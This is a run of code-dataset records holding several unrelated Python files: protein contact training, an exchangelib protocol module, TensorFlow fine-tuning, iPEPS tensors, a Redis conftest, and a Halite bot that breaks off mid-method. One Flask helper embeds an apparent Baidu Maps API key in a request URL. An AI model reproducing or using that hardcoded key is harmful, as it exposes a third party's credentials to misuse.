chain_interface.getChids(), chain_interface.getIcodes(), chain_interface.getIndices().tolist()):\n if not icode_id:\n icode_id = \"_\"\n number_id = '`{}{}`'.format(str(number_id), icode_id)\n first_residue_picker = pdb.select('ca chain '+ chain_id +' and resid '+ number_id +'')\n first_residue_residue_id = list(first_residue_picker.getResnames())[0]\n\n residue_interface = pdb.select('(ca same residue as within '+ radius +'.00 of (noh resid '+ number_id +' and chain '+ chain_id +')) and not chain '+ chain_id +'')\n\n if residue_interface is None:\n continue\n\n residue_id_contact_list = list(residue_interface.getResnames().tolist())\n for res in residue_id_contact_list:\n observed_contacts_dictionary.setdefault(res, {}).setdefault(first_residue_residue_id, 0)\n observed_contacts_dictionary[res][first_residue_residue_id] += 1\n #print(observed_contacts_dictionary)\n return observed_contacts_dictionary\n\ndef main():\n path_training_folders=\"/home/pepamengual/UEPPi/ueppi_script/training/all_complexes/interactome_*\"\n radius = 4\n number_of_processors = 27\n training_data = training_with_multiprocessing(radius, number_of_processors, path_training_folders)\n dump(training_data, \"single_contact_matrix\", compression=\"lzma\", set_default_extension=False)\nmain()\n","sub_path":"predictor/single_contact_training.py","file_name":"single_contact_training.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"28530457","text":"from flask import app\nimport jieba\nimport datetime\nfrom itsdangerous import json\nimport requests\n\n\n# 加载初始化数据\ndef dataLoading():\n # 返回可选的建造年份\n years = []\n year = datetime.datetime.now().year\n while year - 10 >= 1980:\n interval = str(year - 10) + \"-\" + str(year)\n years.append(interval)\n print(interval)\n year -= 10\n\n # 返回可选房型\n roomType = ['1居室', '1室1厅', '2室1厅', '2室2厅', '3室1厅', '3室2厅', '4室1厅', '4室2厅']\n\n # 可选楼层类型\n floorType = ['低层', '中层', '高层']\n\n return roomType, floorType, years\n\n\n# 根据经纬度获取城市\ndef getCityNow(latitude, longitude):\n # 获取前端传来经纬度 并获取完整url\n url = 'http://api.map.baidu.com/reverse_geocoding/v3/?ak=nXyAXdETM2NjnmuABSvXSvliRvxGb5Em&output=json' \\\n '&coordtype=wgs84ll&location=' + latitude + ',' + longitude + '&oe=utf-8&format=json';\n\n # 访问api获取经纬度所对应的城市信息\n res = requests.get(url)\n res.encoding = 'utf-8'\n result = json.loads(res.text)[\"result\"][\"formatted_address\"]\n\n # 获取并返回省级行政区信息\n province = list(jieba.cut(result))[0] # jieba分割句子,得出省份\n city = list(jieba.cut(result))[1]\n dict = {'province': province, 'city': city}\n print(province + city)\n return dict\n","sub_path":"view/DataToHTML.py","file_name":"DataToHTML.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"26092636","text":"\"\"\"\nA protocol is an endpoint for EWS service connections. It contains all necessary information to make HTTPS connections.\n\nProtocols should be accessed through an Account, and are either created from a default Configuration or autodiscovered\nwhen creating an Account.\n\"\"\"\nimport socket\nimport queue\nfrom multiprocessing.pool import ThreadPool\nimport logging\nfrom collections import defaultdict\nfrom threading import Lock\nimport random\n\nfrom requests import adapters, Session\n\nfrom .credentials import Credentials\nfrom .errors import TransportError\nfrom .transport import get_auth_instance, get_service_authtype, get_docs_authtype, test_credentials, AUTH_TYPE_MAP\nfrom .version import Version, API_VERSIONS\nfrom .util import split_url\n\nlog = logging.getLogger(__name__)\n\n# Used to cache version and auth types for visited servers\n_server_cache = defaultdict(dict)\n_server_cache_lock = Lock()\n\n\ndef close_connections():\n for cached_key, cached_values in _server_cache.items():\n server = cached_key[0] # cached_key = server, username\n # Create a simple Protocol that we can close TCP connections on\n cached_protocol = Protocol(service_endpoint='https://%s/EWS/Exchange.asmx' % server,\n credentials=Credentials('', ''))\n cached_protocol.close()\n\n\nclass BaseProtocol:\n # Base class for Protocol which implements the bare essentials\n\n # The maximum number of sessions (== TCP connections, see below) we will open to this service endpoint. Keep this\n # low unless you have an agreement with the Exchange admin on the receiving end to hammer the server and\n # rate-limiting policies have been disabled for the connecting user.\n SESSION_POOLSIZE = 4\n # We want only 1 TCP connection per Session object. We may have lots of different credentials hitting the server and\n # each credential needs its own session (NTLM auth will only send credentials once and then secure the connection,\n # so a connection can only handle requests for one credential). 
Having multiple connections ser Session could\n # quickly exhaust the maximum number of concurrent connections the Exchange server allows from one client.\n CONNECTIONS_PER_SESSION = 1\n # Timeout for HTTP requests\n TIMEOUT = 120\n\n def __init__(self, service_endpoint, credentials, auth_type, verify_ssl):\n assert isinstance(credentials, Credentials)\n if auth_type is not None:\n assert auth_type in AUTH_TYPE_MAP, 'Unsupported auth type %s' % auth_type\n self.has_ssl, self.server, _ = split_url(service_endpoint)\n self.credentials = credentials\n self.service_endpoint = service_endpoint\n self.auth_type = auth_type\n self.verify_ssl = verify_ssl\n self._session_pool = None # Consumers need to fill the session pool themselves\n\n def close(self):\n log.debug('Server %s: Closing sessions', self.server)\n while True:\n try:\n self._session_pool.get(block=False).close_socket(self.service_endpoint)\n except queue.Empty:\n break\n\n def get_session(self):\n _timeout = 60 # Rate-limit messages about session starvation\n while True:\n try:\n log.debug('Server %s: Waiting for session', self.server)\n session = self._session_pool.get(timeout=_timeout)\n log.debug('Server %s: Got session %s', self.server, session.session_id)\n return session\n except queue.Empty:\n # This is normal when we have many worker threads starving for available sessions\n log.debug('Server %s: No sessions available for %s seconds', self.server, _timeout)\n\n def release_session(self, session):\n # This should never fail, as we don't have more sessions than the queue contains\n log.debug('Server %s: Releasing session %s', self.server, session.session_id)\n try:\n self._session_pool.put(session, block=False)\n except queue.Full:\n log.debug('Server %s: Session pool was already full %s', self.server, session.session_id)\n\n def retire_session(self, session):\n # The session is useless. Close it completely and place a fresh session in the pool\n log.debug('Server %s: Retiring session %s', self.server, session.session_id)\n session.close_socket(self.service_endpoint)\n del session\n self.release_session(self.create_session())\n\n def renew_session(self, session):\n # The session is useless. Close it completely and place a fresh session in the pool\n log.debug('Server %s: Renewing session %s', self.server, session.session_id)\n session.close_socket(self.service_endpoint)\n del session\n return self.create_session()\n\n def create_session(self):\n session = EWSSession(self)\n session.auth = get_auth_instance(credentials=self.credentials, auth_type=self.auth_type)\n # Leave this inside the loop because headers are mutable\n headers = {'Content-Type': 'text/xml; charset=utf-8', 'Accept-Encoding': 'compress, gzip'}\n session.headers.update(headers)\n scheme = 'https' if self.has_ssl else 'http'\n # We want just one connection per session. 
No retries, since we wrap all requests in our own retry handler\n session.mount('%s://' % scheme, adapters.HTTPAdapter(\n pool_block=True,\n pool_connections=self.CONNECTIONS_PER_SESSION,\n pool_maxsize=self.CONNECTIONS_PER_SESSION,\n max_retries=0\n ))\n log.debug('Server %s: Created session %s', self.server, session.session_id)\n return session\n\n def test(self):\n # We need the version for this\n try:\n socket.gethostbyname_ex(self.server)[2][0]\n except socket.gaierror as e:\n raise TransportError(\"Server '%s' does not exist\" % self.server) from e\n return test_credentials(protocol=self)\n\n def __repr__(self):\n return self.__class__.__name__ + repr((self.service_endpoint, self.credentials, self.auth_type,\n self.verify_ssl))\n\n\nclass Protocol(BaseProtocol):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n scheme = 'https' if self.has_ssl else 'https'\n self.wsdl_url = '%s://%s/EWS/Services.wsdl' % (scheme, self.server)\n self.messages_url = '%s://%s/EWS/messages.xsd' % (scheme, self.server)\n self.types_url = '%s://%s/EWS/types.xsd' % (scheme, self.server)\n\n # Acquire lock to guard against multiple threads competing to cache information. Having a per-server lock is\n # overkill.\n log.debug('Waiting for _server_cache_lock')\n with _server_cache_lock:\n _server_cache_key = self.server, self.credentials\n if _server_cache_key in _server_cache:\n # Get cached version and auth types and session / thread pools\n log.debug(\"Cache hit for server '%s'\", self.server)\n auth_type = self.auth_type\n for k, v in _server_cache[_server_cache_key].items():\n setattr(self, k, v)\n\n if auth_type:\n if auth_type != self.auth_type:\n # Some Exchange servers just can't make up their mind about which auth to prefer\n log.debug('Auth type mismatch on server %s. %s != %s' % (self.server, auth_type,\n self.auth_type))\n else:\n log.debug(\"Cache miss. Adding server '%s', poolsize %s, timeout %s\", self.server, self.SESSION_POOLSIZE,\n self.TIMEOUT)\n # Autodetect authentication type if necessary\n if not self.auth_type:\n self.auth_type = get_service_authtype(service_endpoint=self.service_endpoint, versions=API_VERSIONS,\n verify=self.verify_ssl)\n self.docs_auth_type = get_docs_authtype(verify=self.verify_ssl, docs_url=self.types_url)\n\n # Try to behave nicely with the Exchange server. We want to keep the connection open between requests.\n # We also want to re-use sessions, to avoid the NTLM auth handshake on every request.\n self._session_pool = queue.LifoQueue(maxsize=self.SESSION_POOLSIZE)\n for i in range(self.SESSION_POOLSIZE):\n self._session_pool.put(self.create_session(), block=False)\n\n # Used by services to process service requests that are able to run in parallel. 
Thread pool should be\n # larger than connection the pool so we have time to process data without idling the connection.\n thread_poolsize = 4 * self.SESSION_POOLSIZE\n self.thread_pool = ThreadPool(processes=thread_poolsize)\n\n # Needs auth objects and a working session pool\n self.version = Version.guess(self)\n\n # Cache results\n _server_cache[_server_cache_key] = dict(\n version=self.version,\n auth_type=self.auth_type,\n docs_auth_type=self.docs_auth_type,\n thread_pool=self.thread_pool,\n _session_pool=self._session_pool,\n )\n log.debug('_server_cache_lock released')\n\n def __str__(self):\n return '''\\\nEWS url: %s\nProduct name: %s\nEWS API version: %s\nBuild number: %s\nEWS auth: %s\nXSD auth: %s''' % (\n self.service_endpoint,\n self.version.fullname,\n self.version.api_version,\n self.version.build,\n self.auth_type,\n self.docs_auth_type,\n )\n\n\nclass EWSSession(Session):\n # A requests Session object that closes the underlying socket when we need it\n def __init__(self, protocol):\n self.session_id = random.randint(1, 32767) # Used for debugging messages in services\n self.protocol = protocol\n super().__init__()\n\n def close_socket(self, url):\n # Close underlying socket. This ensures we don't leave stray sockets around after program exit.\n adapter = self.get_adapter(url)\n pool = adapter.get_connection(url)\n for i in range(pool.pool.qsize()):\n conn = pool._get_conn()\n if conn.sock:\n log.debug('Closing socket %s', str(conn.sock.getsockname()))\n conn.sock.shutdown(socket.SHUT_RDWR)\n conn.sock.close()\n\n def __enter__(self):\n return super().__enter__()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if exc_type is None:\n self.protocol.release_session(self)\n else:\n self.protocol.retire_session(self)\n # return super().__exit__() # We want to close the session socket explicitly\n","sub_path":"exchangelib/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":10999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"458605748","text":"import csv\nimport logging\nimport os\nimport pdb\n\nfrom tqdm import tqdm\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\n\"\"\"\nThis script should read in the existing train/ set of documents\nand pull out documents that we know that Digikey has and put them\ninto a separate dir for comparison purposes.\n\"\"\"\n\n\ndef get_digikey_filenames(goldfile):\n \"\"\"Returns a set of all filenames found in Digikey's gold csv.\"\"\"\n digikey_filenames = set()\n with open(goldfile, \"r\") as gold:\n reader = csv.reader(gold)\n for line in reader:\n filename = line[0]\n digikey_filenames.add(filename.upper())\n if len(digikey_filenames) != 0:\n return digikey_filenames\n else:\n logger.error(f\"No digikey filenames found in {goldfile}.\")\n pdb.set_trace()\n\n\ndef get_valid_filenames(dirname, digikey_filenames):\n \"\"\"Returns a sest of filenames that are found both in\n Digikey's gold CSV and in the target dataset directory.\"\"\"\n valid_filenames = set()\n logger.info(f\"Getting valid filenames from {dirname}\")\n for filename in tqdm(os.listdir(dirname)):\n if filename.endswith(\".pdf\") or filename.endswith(\".PDF\"):\n if filename.upper().replace(\".PDF\", \"\") in digikey_filenames:\n valid_filenames.add(filename.replace(\".pdf\", \"\").replace(\".PDF\", \"\"))\n if len(valid_filenames) != 0:\n return valid_filenames\n else:\n logger.error(f\"No valid filenames found in {dirname}.\")\n pdb.set_trace()\n\n\ndef move_valid_files(pdf, html, valid_filenames, limit=100, out=\"analysis/\"):\n \"\"\"Moves all filenames found in valid_filenames into an analysis\n dataset directory for comparison.\"\"\"\n endpath = os.path.join(os.path.dirname(__file__), out)\n # if len(valid_filenames) < limit:\n # logger.error(\n # f\"{len(valid_filenames)} valid filenames is \"\n # + f\"not enough to satisfy limit of {limit}.\"\n # )\n # pdb.set_trace()\n # elif len(valid_filenames) != limit:\n # valid_filenames = set(list(valid_filenames)[:limit])\n logger.info(f\"Moving {len(valid_filenames)} files into {out} from {pdf} and {html}\")\n for i, filename in enumerate(tqdm(valid_filenames)):\n if filename + \".pdf\" in os.listdir(pdf):\n os.rename(\n os.path.join(pdf, filename + \".pdf\"),\n os.path.join(endpath + \"pdf/\", filename + \".pdf\"),\n )\n elif filename + \".PDF\" in os.listdir(pdf):\n os.rename(\n os.path.join(pdf, filename + \".PDF\"),\n os.path.join(endpath + \"pdf/\", filename + \".pdf\"),\n )\n else:\n logger.error(f\"Filename {filename} not found in {pdf}\")\n pdb.set_trace()\n if filename + \".html\" in os.listdir(html):\n os.rename(\n os.path.join(html, filename + \".html\"),\n os.path.join(endpath + \"html/\", filename + \".html\"),\n )\n elif filename + \".HTML\" in os.listdir(html):\n os.rename(\n os.path.join(html, filename + \".HTML\"),\n os.path.join(endpath + \"html/\", filename + \".html\"),\n )\n else:\n logger.error(f\"Filename {filename} not found in {html}\")\n pdb.set_trace()\n if i >= limit:\n return\n\n\nif __name__ == \"__main__\":\n\n # Run extraction on dev set\n dirname = os.path.dirname(__file__)\n pdfdir = os.path.join(dirname, \"../../dev/pdf/\")\n htmldir = os.path.join(dirname, \"../../dev/html\")\n gold_file = os.path.join(dirname, \"../../standard_digikey_gold.csv\")\n\n digikey_filenames = get_digikey_filenames(gold_file)\n\n filenames = get_valid_filenames(pdfdir, digikey_filenames)\n move_valid_files(pdfdir, htmldir, filenames, out=\"../../analysis/\")\n\n # Run extraction on test set\n pdfdir = 
os.path.join(dirname, \"../../test/pdf/\")\n htmldir = os.path.join(dirname, \"../../test/html\")\n\n digikey_filenames = get_digikey_filenames(gold_file)\n\n filenames = get_valid_filenames(pdfdir, digikey_filenames)\n move_valid_files(pdfdir, htmldir, filenames, out=\"../../analysis/\")\n","sub_path":"hack/transistors/data/utils/analysis/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"280513186","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 23 15:06:56 2018\n\n@author: yyk\n\"\"\"\n\n\nfrom __future__ import division\n\nimport tensorflow as tf\nimport Get_data\nimport OCN\nimport Option\nimport os\nimport numpy as np\nimport Log\nimport matplotlib.pyplot as plt\n\nos.environ['CUDA_VISIBLE_DEVICES']='1'\nconfig=tf.ConfigProto()\nconfig.gpu_options.allow_growth=True\n\ndataset_name='mnist'\nresult_path='../transderlearning_experiment/'\nif not os.path.isdir(result_path):\n os.mkdir(result_path)\n os.mkdir(result_path+dataset_name)\nresult_path=result_path+dataset_name+'/'\n\nlog_path=result_path+'log.txt'\n\ndef save_img(imgs,path):\n if not os.path.exists(result_path+path):\n os.mkdir(result_path+path)\n for i in range(imgs.shape[0]): \n plt.figure(figsize=(4.32,2.88))\n if i%50==0:\n print('saving '+path+':',i)\n plt.imshow((imgs[i,:,:,0]),cmap='gray',interpolation=\"bicubic\")\n plt.savefig(result_path+path+'/'+str(i)+'.jpg')\n plt.close() \n\n\nLog.Log(log_path, 'w+', 1) # set log file\n\nfine_tfrecords_trainpath='../transferlearning_dataset/mnist_train_data.tfrecords'\nfine_tfrecords_testpath='../transferlearning_dataset/mnist_test_data.tfrecords'\n\n\ntrain_data_batch,train_label_batch=Get_data.read_and_decode(fine_tfrecords_trainpath, batch_size=Option.batch_size,data_name='train_data',label_name='train_label')\ntest_data_batch,test_label_batch=Get_data.read_and_decode(fine_tfrecords_testpath, batch_size=Option.batch_size,data_name='test_data',label_name='test_label')\n\n\n\ntrain_imgs=OCN.build(train_data_batch,Option.channel,is_training=False,fine_tuning=False,keep_prob=0.3)\ntest_imgs=OCN.build(test_data_batch,Option.channel,is_training=False,fine_tuning=False,keep_prob=1.0)\n\n\n\n\nl2_loss_op=OCN.l2_loss(name='train_l2_loss_op')\n\n\n\ntrain_sharp_loss_op=OCN.sharpness(train_imgs,train_label_batch,name='train_sharp_loss_op')\ntrain_mse_loss_op=OCN.mse_loss(train_imgs,train_label_batch,name='test_mse_loss_op')\ntrain_loss_op=tf.add(l2_loss_op+train_sharp_loss_op+train_mse_loss_op,0.0,name='train_loss')\n\n\n\ntest_sharp_loss_op=OCN.sharpness(test_imgs,test_label_batch,name='train_sharp_loss_op')\ntest_mse_loss_op=OCN.mse_loss(test_imgs,test_label_batch,name='test_mse_loss_op')\ntest_loss_op=tf.add(l2_loss_op+test_sharp_loss_op+test_mse_loss_op,0.0,name='train_loss')\n\n\nglobal_step = tf.Variable(0, name = 'global_step', trainable = False)\n \nfine_tuing_op=OCN.fine_tune9(train_loss_op,Option.learning_rate,Option.learning_rate_decay_steps,Option.learning_rate_decay_rate,\\\n global_step,name='fine_tuing_op')\n\n\n\n \n#total_loss_op=tf.add(l2_loss_op+sharp_loss_op+mse_loss_op,0.0,name='train_total_loss_op') \n \ninit_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\nsess=tf.Session(config=config)\nsess.run(init_op)\n\n\nmodel_path='../training_experiment/2019-10-22-12:34:24/model/'\n\n\n\n\n\nmodel_file=tf.train.latest_checkpoint(model_path)\nSaver=tf.train.Saver()\nSaver.restore(sess,model_file)\n\n\n\n\n\ncoord=tf.train.Coordinator()\nthreads=tf.train.start_queue_runners(sess=sess,coord=coord) \nstep=0\n\nprint('<<<<<<<<<<>>>>>>>>>>')\nmodel_imgs=sess.run(test_imgs)\nif not os.path.exists(result_path+'data'):\n os.mkdir(result_path+'data')\nnp.save(result_path+'/data/'+'model_imgs.npy',model_imgs)\nsave_img(model_imgs,'model_imgs(before finetuning)')\n\n\ntest_imgs_list=[]\n\ntry:\n while not coord.should_stop():\n if step%10==0:\n 
test_imgs_,test_label_imgs_,test_mse_,test_sharp_loss_,test_loss_=sess.run([test_imgs,test_label_batch,\\\n test_mse_loss_op,test_sharp_loss_op,test_loss_op])\n print('<<<<< a[s,u,l,d,r]\n |\n d\n \n where s denotes physical index, and u,l,d,r label four principal directions\n up, left, down, right in anti-clockwise order starting from up.\n \"\"\"\n assert isinstance(site,torch.Tensor), \"site is not a torch.Tensor\"\n super().__init__(dict({(0,0): site}),peps_args=peps_args,\\\n global_args=global_args)\n\n def site(self,coord=None):\n return self.sites[(0,0)]\n\n def add_noise(self,noise,symmetrize=False):\n r\"\"\"\n :param noise: magnitude of the noise\n :type noise: float\n\n Take IPEPS and add random uniform noise with magnitude ``noise`` to on-site tensor\n \"\"\"\n rand_t = torch.rand( self.site().size(), dtype=self.dtype, device=self.device)\n self.sites[(0,0)]= self.site() + noise * rand_t\n if symmetrize:\n self.sites[(0,0)]= make_c4v_symm(self.site())\n\n def write_to_file(self,outputfile,symmetrize=True,**kwargs):\n # symmetrize before writing out\n tmp_t= make_c4v_symm(self.site()) if symmetrize else self.site()\n tmp_state= IPEPS_C4V(tmp_t)\n ipeps.write_ipeps(tmp_state, outputfile,**kwargs)\n\ndef extend_bond_dim(state, new_d):\n return ipeps.extend_bond_dim(state, new_d)\n\ndef to_ipeps_c4v(state, normalize=False):\n assert len(state.sites.items())==1, \"state has more than a single on-site tensor\"\n A= next(iter(state.sites.values()))\n A= make_c4v_symm(A)\n # if normalize: A= A/torch.max(torch.abs(A))\n if normalize: A= A/A.norm()\n return IPEPS_C4V(A)\n\ndef read_ipeps_c4v(jsonfile, aux_seq=[0,1,2,3], peps_args=cfg.peps_args,\\\n global_args=cfg.global_args):\n r\"\"\"\n :param jsonfile: input file describing IPEPS_C4V in json format\n :param aux_seq: array specifying order of auxiliary indices of on-site tensors stored\n in `jsonfile`\n :param peps_args: ipeps configuration\n :param global_args: global configuration\n :type jsonfile: str or Path object\n :type aux_seq: list[int]\n :type peps_args: PEPSARGS\n :type global_args: GLOBALARGS\n :return: wavefunction\n :rtype: IPEPS_C4V\n \n Parameter ``aux_seq`` defines the expected order of auxiliary indices\n in input file relative to the convention fixed in tn-torch::\n \n 0\n 1A3 <=> [up, left, down, right]: aux_seq=[0,1,2,3]\n 2\n \n for alternative order, eg.\n \n 1\n 0A2 <=> [left, up, right, down]: aux_seq=[1,0,3,2] \n 3\n \"\"\"\n state= ipeps.read_ipeps(jsonfile, aux_seq=aux_seq, peps_args=peps_args,\\\n global_args=global_args)\n assert len(state.sites.items())==1, \"state has more than a single on-site tensor\"\n return IPEPS_C4V(next(iter(state.sites.values())))\n","sub_path":"ipeps/ipeps_c4v.py","file_name":"ipeps_c4v.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"494354726","text":"from redis import Redis\nimport pytest\n\n# to allow us to run all tests that have no markings as -m unmarked\ndef pytest_collection_modifyitems(items, config):\n for item in items:\n if not any(item.iter_markers()):\n item.add_marker(\"unmarked\")\n\n\ndef skip_ifmodversion_lt(min_version: str, module_name: str):\n rc = Redis()\n modules = rc.execute_command(\"module list\")\n if modules is None:\n return\n\n version = None\n for module_info in modules:\n if module_info[b\"name\"] == module_name.encode():\n version = int(module_info[b\"ver\"])\n\n if version is None:\n raise AttributeError(\"No redis module named {}\".format(module_name))\n mv = int(min_version.replace(\".\", \"\"))\n check = version < mv\n return pytest.mark.skipif(check, reason=\"Redis module version\")\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"486820110","text":"\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom keras.utils import np_utils\nimport Dataset\n\n\nclass Neural():\n\n def __init__(self):\n # Create the model:\n self.model = tf.keras.models.Sequential()\n\n # Add layers\n self.model.add(tf.keras.layers.Dense(60, activation='tanh'))\n self.model.add(tf.keras.layers.Dense(60, activation='relu'))\n self.model.add(tf.keras.layers.Dense(16, activation='tanh'))\n self.model.add(tf.keras.layers.Dropout(0.2))\n self.model.add(tf.keras.layers.Dense(1, activation='sigmoid'))\n\n # Loss computer:\n self.train_loss_object = tf.keras.losses.BinaryCrossentropy()\n self.test_loss_object = tf.keras.losses.BinaryCrossentropy()\n\n # Loss accumulator:\n self.train_loss_accu = tf.keras.metrics.Mean(name='train_loss')\n self.test_loss_accu = tf.keras.metrics.Mean(name='Test_loss')\n\n # Optimizer\n self.optimizer = tf.keras.optimizers.Adam()\n\n # Training_set to use\n self.dataset = None\n\n @tf.function\n def train_step(self, x_train, y_train, x_test, y_test, s_weights_train, s_weights_test):\n \"\"\"\n Training function\n \"\"\"\n # Find gradient:\n with tf.GradientTape() as tape: # To capture errors for the gradient modification\n # Make prediction\n train_predictions = self.model(x_train)\n # Get the error:\n train_loss = self.train_loss_object(y_train, train_predictions, sample_weight=s_weights_train)\n # Compute the gradient who respect the loss\n gradients = tape.gradient(train_loss, self.model.trainable_variables)\n # Change weights of the model\n self.optimizer.apply_gradients(zip(gradients, self.model.trainable_variables))\n # Store losses:\n self.train_loss_accu(train_loss)\n # If test error wanted\n\n if x_test is not None:\n # Compute test error:\n test_predictions = self.model(x_test)\n test_loss = self.train_loss_object(y_test, test_predictions, sample_weight=s_weights_test)\n self.test_loss_accu(test_loss)\n\n\n def train(self):\n\n x_train = self.dataset.pairs_train_x\n y_train = self.dataset.pairs_train_y\n x_test = self.dataset.pairs_test_x\n y_test = self.dataset.pairs_test_y\n\n # Build sample weights:\n s_weights_train = np.ones(x_train.shape[0])\n s_weights_test = np.ones(x_test.shape[0])\n for i in range(0, x_train.shape[0]):\n if y_train[i] == 1:\n s_weights_train[i] = 21\n for i in range(0, x_test.shape[0]):\n if y_test[i] == 1:\n s_weights_test[i] = 21\n\n s_weights_test = y_test * 21\n for epoch in range(0, 20):\n for _ in range(0, 100):\n # Make a train step\n self.train_step(x_train, y_train, x_test, y_test, s_weights_train, s_weights_test)\n\n print('Epoch: {}'.format(epoch))\n # Print the loss: return the mean of all error in the accumulator\n print('Test Loss: %s' % self.test_loss_accu.result())\n print('Train Loss: %s' % self.train_loss_accu.result())\n # Reset the accumulator\n self.train_loss_accu.reset_states()\n self.test_loss_accu.reset_states()\n\n def predict_pass(self, df_x):\n\n # Adapt inputs according to features of the learning set\n x_pairs = self.dataset.convertor(df_x)\n # Numpy version\n df_np = df_x.to_numpy()\n\n # Make predictions:\n pred = self.model.predict(x_pairs)\n # Reshape:\n pred = np.reshape(pred, (-1, 22))\n # Store final numeric prediction:\n final_pred = np.zeros(pred.shape[0])\n for i in range(0, pred.shape[0]):\n final_pred[i] = np.argmax(pred[i, :]) + 1\n\n return final_pred\n\n def set_dataset(self, dataset):\n\n self.dataset = 
dataset\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"old3/Neural_Ben.py","file_name":"Neural_Ben.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"448635925","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tablefor2', '0032_auto_20170710_0507'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='profile',\n name='distinct_id',\n field=models.CharField(max_length=50, null=True),\n ),\n migrations.AlterField(\n model_name='availability',\n name='time_available',\n field=models.DateTimeField(default=datetime.datetime(2017, 7, 17, 1, 6, 56, 858493, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='availability',\n name='time_available_utc',\n field=models.DateTimeField(default=datetime.datetime(2017, 7, 17, 1, 6, 56, 858512, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='profile',\n name='date_joined',\n field=models.DateTimeField(default=datetime.datetime(2017, 7, 17, 1, 6, 56, 857178, tzinfo=utc)),\n ),\n ]\n","sub_path":"tablefor2/migrations/0033_auto_20170717_0106.py","file_name":"0033_auto_20170717_0106.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"455498687","text":"from kaggle_environments.envs.halite.helpers import Board, ShipAction, ShipyardAction\nimport pandas as pd\nimport numpy as np\n\n\nclass DecisionShip:\n \"\"\" \n Decides ship's next move\n params:\n board: the board that we will base our decisions on\n ship: the ship we are deciding for\n step: the steps into the stimulation\n \"\"\"\n def __init__(self, board: Board, ship_id, step):\n self.board = board\n self.ship = board.ships[ship_id]\n self.step = step\n # Some usefull properties\n self.player = self.board.current_player\n self.ship_cargo = self.ship.halite\n self.current_cell = self.ship.cell\n self.current_position = self.ship.position\n # All moves ship can take\n self.moves = {\"N\": ShipAction.NORTH, 'S': ShipAction.SOUTH, 'W': ShipAction.WEST,\n 'E': ShipAction.EAST, 'convert': ShipAction.CONVERT, 'mine': None}\n # The list of moves that should not be taken\n self.eliminated_moves = ['None']\n # Weights of different moves\n self.weights = {\"N\": 0, \"E\": 0, \"W\": 0, \"S\": 0, \"mine\": 0, \"convert\": 0, 'None': 0}\n # The cells around the main one\n self.grid = grid(self.ship.cell)\n # Closest shipyard id and the distance\n self.closest_shipyard_id, self.closest_shipyard_distance = self.closest_shipyard()\n # Default move which is set to mining (None)\n self.next_move = None\n # This variable holds info on the cell being analyzed\n self.current = {}\n # Setting the hyper parameters\n self.set_hyperparameters()\n\n def set_hyperparameters(self):\n \"\"\" Initializes the hyperparameters that will affect the decision process \"\"\"\n self.MINING = 600 + (self.step // 40) * 100\n self.DEPOSIT = 800 + (self.step // 300) * 300 + self.step // 380 * 1000\n self.ATTACK_ENEMY_SHIP = 600 - (self.step // 150) * 200\n self.DIRECTION_ENCOURAGEMENT = 150 - (self.step // 120) * 40 \n self.DISTRIBUTION = -1000 + (self.step // 200) * 50\n self.GET_AWAY = -500 + (self.step // 100) * 20\n self.CLOSEST_SHIPYARD = 500 + (self.step // 60) * 100\n self.CONVERSION = 80 - (self.step // 200) * 10\n self.CARGO_THRESHHOLD = 600\n\n def determine(self):\n \"\"\" Returns next action decided for the ship based on the observations that have been made. 
\"\"\"\n self.weight_moves() # Calculate the weights for main four directions\n self.round() # Round the weights\n self.apply_elimination() # Apply the eliminations\n\n # Sort the values\n sorted_weights = {k: v for k, v in sorted(self.weights.items(), key=lambda item: item[1], reverse=True)}\n\n # Choose the action with highest value given that it is not eliminated\n for action in sorted_weights.keys():\n return self.moves[action], action\n\n # If none were chosen, then just return the default move which is mining\n return self.next_move, 'mine'\n\n def add_accordingly(self, value, title=\"\", loging=False):\n \"\"\" Adds a value to directions according to their corresponding weights \"\"\"\n weightX, weightY, dirX, dirY, movesX, movesY = 0, 0, \"\", \"\", 0, 0\n\n if \"N\" in self.current['dir']:\n dirY, movesY = 'N', self.current['dir'].count(\"N\")\n weightY = 1 / (len(self.current['dir']) ** 2 * movesY)\n elif \"S\" in self.current['dir']:\n dirY, movesY = 'S', self.current['dir'].count(\"S\")\n weightY = 1 / (len(self.current['dir']) ** 2 * movesY)\n\n if \"W\" in self.current['dir']:\n dirX, movesX = 'W', self.current['dir'].count(\"W\")\n weightX = 1 / (len(self.current['dir']) ** 2 * movesX)\n elif \"E\" in self.current['dir']:\n dirX, movesX = 'E', self.current['dir'].count(\"E\")\n weightX = 